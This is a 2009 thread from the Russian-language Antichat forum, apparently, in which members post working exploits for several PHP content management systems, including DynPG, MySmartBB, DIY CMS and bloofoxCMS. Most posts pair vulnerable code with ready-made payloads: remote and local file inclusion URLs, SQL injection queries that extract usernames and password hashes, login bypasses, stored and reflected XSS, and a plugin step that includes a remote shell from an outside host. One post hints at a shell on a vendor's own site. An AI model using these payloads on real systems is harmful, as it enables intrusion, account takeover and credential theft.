HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.12.2009, 20:11
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию

DynPG CMS 4.0.0
Web site : http://www.dynpg.org
Vesrion : 4.0.0


[Remote File Inclusion]

Vuln file: counter.php [str:15]
PHP код:
    $inc = empty($_GET["inc"]) ? $_GET["inc"];

    if ( !empty(
$inc) ) {
        
# Aufruf des Counters ьber einen Link. $inc enthдlt dann die Datenbankkennung!

        
$inc_or   htmlentities(urldecode($inc));
        
$inc_head urldecode(str_replace('&''&'$inc));
        
$inc      addslashes(strtolower($inc));

        if ( empty(
$GLOBALS["DefineRootToTool"]) ) {
            
$GLOBALS["DefineRootToTool"] = "";
        }

        require_once 
$GLOBALS["DefineRootToTool"]."config.php"
Exploit:
if register_globals = ON && allow_url_include = ON
Код:
http://[host]/[path]/counter.php?inc=1&DefineRootToTool=[shell]?
[Local File Inclusion]

Vuln file: languages.inc.php [str:5]
PHP код:
   global $lang_dpg;

   require_once 
dirname(__FILE__) . '/plugins/languages.php';
   require_once 
dirname(__FILE__) . '/localised/dynpg_backend/'.strtolower($_SESSION["LANGUAGE"]).'.lang.php'
Exploit:
if register_globals = ON && magic_quotes = OFF
Код:
http://[host]/[path]/languages.inc.php?_SESSION[LANGUAGE]=../../../../../../../../[local_file]%00
 
Ответить с цитированием

  #2  
Старый 15.12.2009, 11:40
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Программа: MySmartBB 1.1.0
Сайт: mysmartbb.com
Описание уязвимости: возможен обход авторизации
Уязвимый код login.php:
PHP код:
$password md5($_POST['T2']);
     
$check    $DB->sql_query("SELECT * FROM MySBB_member WHERE username='" $_POST['T1'] . "' AND password='" $password "'");
     
$num      $DB->sql_num_rows($check); 
эксплойт:
Код:
login: 'or+5=5#
password: asdfg
если версия MySQL = 5 то можно вывести данные из бд таким POST запросом:
Код:
T1='+and+1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,password,email)+from+mysbb_member+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,password,email)+from+mysbb_member+limit+1),14)e)b)a)+--+&T2=1233&B1=%E3%E6%C7%DD%DE
 
Ответить с цитированием

  #3  
Старый 17.12.2009, 03:02
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


По умолчанию

AmiroCMS-Free-5.4.4.0
Раскрытие путей

Код:
http://localhost:7777/eshop_final.php
Код:
Fatal error: main() [function.require]: Failed opening required '_shared/code/includes/eshop_final.php' (include_path='.;/usr/local/php/PEAR') in C:\WebServers\home\localhost\www\AmiroCMS\home\localhost\www\eshop_final.php on line 4
Код:
http://localhost:7777/unattened.old.php
Код:
Parse error: syntax error, unexpected T_STRING in C:\WebServers\home\localhost\www\AmiroCMS\home\localhost\www\unattened.old.php on line 4
Уязвимую часть кода к сожалению не смогу показать,зазендено,потом выложу,когда раззендю
 
Ответить с цитированием

  #4  
Старый 19.12.2009, 00:31
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
По умолчанию

Nazep
Product - Nazep
Version - 0.1.4.3

SQL injection
Код:
http://localhost/index/index.php?sec=-1'/**/union/**/all/**/select/**/version()/*
вывод
Код:
<title></title>
Admin Panel
Код:
http://localhost/admon/index.php
Login
login - 'or+1=1#
pass - 123456

Последний раз редактировалось [x60]unu; 19.12.2009 в 00:40..
 
Ответить с цитированием

  #5  
Старый 19.12.2009, 16:57
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
По умолчанию

Moscuito CMS (all vers) - блоговый движок на файлах.
PHPSELF XSS:
Код:
http://localhost/mosquito/%3E%3Cscript%3Ealert()%3C/script%3E
Заливка шелла: Админцентр (дефолтный пароль - pass)-> Новый (плагин) -> <?php include('http://site.com/sh.txt'); ?>
 
Ответить с цитированием

  #6  
Старый 20.12.2009, 00:14
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
По умолчанию

Arcadem Pro CMS [2.7]
xss пассивная:
[localhost]/index.php?cat="><script>alert();</script>
xss пассивная:
[localhost]/index.php?article="><script>alert();</script>
xss активная:
При регистрации, в поле "Логин" вписываем
Цитата:
"><script>alert();</script>
, регистрирумся. При просмотре игроков, статистики и т.д. будет выполняться ваш код.
xss активная:
[localhost]/index.php?loadpage=./includes/articleblock.php&articlecat=[number]
в строке поле комментария вводим
Цитата:
"><script>alert();</script>
и отправляем. При просмотре комментариев выполнится ваш код.
Blind SQL injection:
[localhost]/index.php?article=[number]+and+ascii(substring(version(),19,1))+--+Bb0y
уязвимый код:
PHP код:
$articleid $_GET['article'];

if (
is_numeric(intval($articleid)) == TRUE) {
   
$sql "SELECT * FROM AMCMS_articles WHERE articlekey=$articleid LIMIT 1;"

Последний раз редактировалось Bb0y; 20.12.2009 в 00:17..
 
Ответить с цитированием

webCocoon's simpleCMS Vuln's
  #7  
Старый 20.12.2009, 17:44
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию webCocoon's simpleCMS Vuln's

webCocoon's simpleCMS
Web site : http://webcocoon.wordpress.com
Version : 0.7.0


SQL Injection

Vuln file: /content/post/show.php [str:3]
PHP код:
//Show post
$get_post mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'");
$post_result mysql_num_rows($get_post);
$post mysql_fetch_array($get_post); 
Exploit:
if magic_quotes = OFF
Код:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

id=xek' union select null,concat_ws(0x3a,username,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null from user -- &mode=post&gfile=show
*так же уязвимы параметры: year, month, date

Local File Inclusion

Vuln file: /templates/default/template.html [str:538]
PHP код:
if($mode == ""){
include
"content/front/$template.php";
}
elseif(
$gfile == "$gfile"){
include
"content/$mode/$gfile.php";
}else{
include
"content/front/$template.php";

Exploit:
if magic_quotes = OFF
Код:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

mode=../../../../../../../[local_file]%00&gfile=browse

Последний раз редактировалось RulleR; 20.12.2009 в 17:51..
 
Ответить с цитированием

DIY CMS bSQL inj
  #8  
Старый 21.12.2009, 16:28
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию DIY CMS bSQL inj

DIY CMS (Do It Yourself cms)
Web site : http://www.diy-cms.com
Version : 1.0


Blind SQL Injection

Vuln file: /modules/users/index.php [str:48]
PHP код:
 /*...*/
     
if(isset($diy->get['morder'])) 
    {
    
$order $diy->get['morder'];
    }
    else
    {
      
$order "userid";
    }
    
    if (isset(
$diy->get[msort])) 
    {
        
$sort $diy->get[msort];
    }
    else
    {
         
$sort DESC;
    }
 
/*...*/
     
$result   $diy->query("SELECT * FROM diy_users WHERE userid > '0' and userid != '$diy->Guestid' and activated = 'approved' ORDER BY $order $sort LIMIT $start,$upp"); 
 
/*...*/ 
Если версия MySQL=>5.0.12, можно получить данные из ошибки Duplicate column name
Exploit:
Код:
http://[host]/[path]/mod.php?mod=users&morder=1+and+(select+*+from+(select+*+from+(select+name_const((select+concat_ws(0x3a,username,password)+from+diy_users+where+userid=1),1)a)b+join+(select+name_const((select+concat_ws(0x3a,username,password)+from+diy_users+where+userid=1),1)c)d)e)
*так же уязвим параметр msort
 
Ответить с цитированием

  #9  
Старый 21.12.2009, 21:15
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

там задумывался antihek system) admin/aclass/admin_func.php
Код:
...
38    function format_data($r)
39    {
40       return mysql_escape_string(stripslashes(trim($r)));
41    }
...
68       $user_name = $diy->format_data($diy->post['user_name']);       
69       $user_pass = $diy->format_data(md5($diy->post['user_pass']));
70       $result = $diy->query("SELECT userid,username,password,groupid
71									FROM diy_users
72									WHERE  (username ='$user_name')
73									AND (password ='$user_pass')
74									AND (groupid = 1)");
75       if (@$diy->dbnumrows($result) > 0) {
...
, но post > $user_name='=0)or('
аплоадер admin/aclass/template.php
Код:
...
410        else  if ($action=="uploadtemp")
411        {
412            $upload = $diy->files["name_file"];
413            $theme  = str_replace(' ','_',$diy->post[theme]);
414            $tmp_name =  $upload["tmp_name"];
415
416            if (is_uploaded_file($upload['tmp_name']))
417            {
418                $path = $diy->upload_path."/".$upload['name'];
419                if(move_uploaded_file($tmp_name, $path))
420                {
...
diy-cms.com/500.php?yaneshell=1
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #10  
Старый 22.12.2009, 01:14
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Product: bloofoxCMS
Author: 0.3.5
Version: http://www.bloofox.com/

LFI


Need: register_globals = ON

file: update/index.php
PHP код:
$update_files[0] = "update_0.3.0-0.3.1.php";
$update_files[1] = "update_0.3.1-0.3.2.php";
$update_files[2] = "update_0.3.2-0.3.3.php";
$update_files[3] = "update_0.3.3-0.3.4.php";
$update_files[4] = "update_0.3.4-0.3.5.php";
....
if(isset(
$_GET['page']) && CheckInteger($_GET['page'])) {
    
$page $_GET['page'];
    
$upd_var['update_file'] = SYS_WORK_DIR."/".$update_files[$page];
    if(
file_exists($upd_var['update_file'])) {
        include_once(
$upd_var['update_file']);
    }

target: Инклуд достаточно интересный,обманем скрипт Вроде быи переменная чекаеться на intval, и файл на существование,но вот переменная инклуда не чекаеться.Создаем не существующую переменную,и сами зададим ей значение:
?update_files[11]=../{LF}&page=11

Blind-SQL


file: plugins/text_news/text_news.php
PHP код:
if($login_required == && $sys_explorer_vars['link_plugin'] == 31) {
    
    
// init db connection
    
$db2 = new DB_Tpl();
    
    
// create page handling
    
$sys_vars $cont->create_pages($db2,$_GET['start'],$sys_vars);
    
    
// set template block
    
$tpl->set_block("template_content""content""content_handle");

    
// get sys_contents
    
$db2->query("SELECT * FROM ".$tbl_prefix."sys_content WHERE explorer_id = '".$cont->eid."' AND blocked = '0' ORDER BY sorting LIMIT ".$sys_vars['start'].",".$cont->limit."");
    
$no_of_records $db2->num_rows(); 
target: ?login_required=0&sys_explorer_vars['link_plugin']=31&tbl_prefix=bfCMS_sys_user+where+id=1/*блабла,в этой таблице 13 колонок.

Последний раз редактировалось m0Hze; 22.12.2009 в 01:29..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.